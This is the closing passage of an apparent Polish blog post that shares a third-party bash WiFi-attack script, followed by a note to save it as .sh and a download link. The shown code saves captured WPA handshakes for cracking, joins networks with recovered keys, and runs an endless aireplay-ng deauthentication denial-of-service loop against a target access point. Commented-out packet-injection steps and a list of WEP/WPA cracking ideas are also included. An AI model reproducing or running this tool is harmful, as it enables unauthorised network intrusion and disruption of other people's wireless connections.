"WPA" ] ; then action "wpa_passphrase" "wpa_passphrase $essid '$key' > /tmp/wiffy.conf" $verbose $diagnostics "true" action "wpa_supplicant" "wpa_supplicant -B -i $interface -c /tmp/wiffy.conf -D wext" $verbose $diagnostics "true" fi sleep 5 action "dhclient" "dhclient $interface" $verbose $diagnostics "true" if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}') display info "IP: $ourIP" $diagnostics #gateway=$(route -n | grep $interface | awk '/^0.0.0.0/ {getline; print $2}') #display info "Gateway: $gateway" $diagnostics fi fi #----------------------------------------------------------------------------------------------# elif [ "$encryption" == "WPA" ] ; then display error "WiFi Key not in wordlist" $diagnostics 1>&2 display action "Moving handshake: $(pwd)/wiffy-$essid.cap" $diagnostics 1>&2 action "Moving capture" "mv -f /tmp/wiffy*.cap $(pwd)/wiffy-$essid.cap" $verbose $diagnostics "true" #----------------------------------------------------------------------------------------------# elif [ "$encryption" != "N/A" ] ; then display error "Something went wrong )=" $diagnostics 1>&2 fi     #----------------------------------------------------------------------------------------------# elif [ "$mode" == "dos" ] ; then display action "Attack (DOS): $essid" $diagnostics command="aireplay-ng --deauth 0 -e \"$essid\" -a $bssid" if [ "$client" != "clientless" ] ; then command="$command -c $client" ; fi command="$command $monitorInterface" action "aireplay-ng (DeAuth)" "$command" $verbose $diagnostics "true" &   #----------------------------------------------------------------------------------------------# display info "Attacking! ...press CTRL+C to stop" $diagnostics if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi for (( ; ; )) ; do sleep 5 done #elif [ "$mode" == "inject" ] ; then # display action "Attack (Inject): $essid" $diagnostics # if [ "$encryption" != "WEP" ] ; then display error "Only works on WEP networks" $diagnostics 1>&2 ; cleanup ; fi   #action "aireplay-ng (Inject)" "airtun-ng -a $bssid $monitorInterface" $verbose $diagnostics "true" & #action "aireplay-ng (Inject)" "ifconfig at0 192.168.1.83 netmask 255.255.255.0 up" $verbose $diagnostics "true" &   # airmon-ng start wlan0 # /pentest/wireless/airpwn-1.4/airpwn -c conf/greet_html -d rt73 -i mon0 -v   #----------------------------------------------------------------------------------------------# # display info "Attacking! ...press CTRL+C to stop" $diagnostics # if [ "$diagnostics" == "true" ] ; then echo "-Ready!----------------------------------" >> $logFile ; fi # for (( ; ; )) ; do # sleep 5 # done fi   #----------------------------------------------------------------------------------------------# if [ "$diagnostics" == "true" ] ; then echo "-Done!---------------------------------------------------------------------------------------" >> $logFile ; fi cleanup clean     #---Ideas--------------------------------------------------------------------------------------# # WEP - Chopchop/FagmentationAP Packet Broadcast # WPA - aircrack/coWPAtty # WPA - brute / hash # WPA - calculate hash # WPA - use pre hash / use pre capture # WPA - use folder for wordlist # WiFi Key is in hex # update - aircrack/coWPATTY # decrypt packets - offline & online (airtun-ng) # Mode - Injection - GET WORKING # display error "The encryption ($encryption) on $essid isn't support" $diagnostics 1>&2 ; cleanup

W przypadku kopiowania powyższego skryptu należy go oczywiście zapisać w pliku o rozszerzeniu *.sh

Do pobrania
*Oczywiście nie moje źródełko. 🙂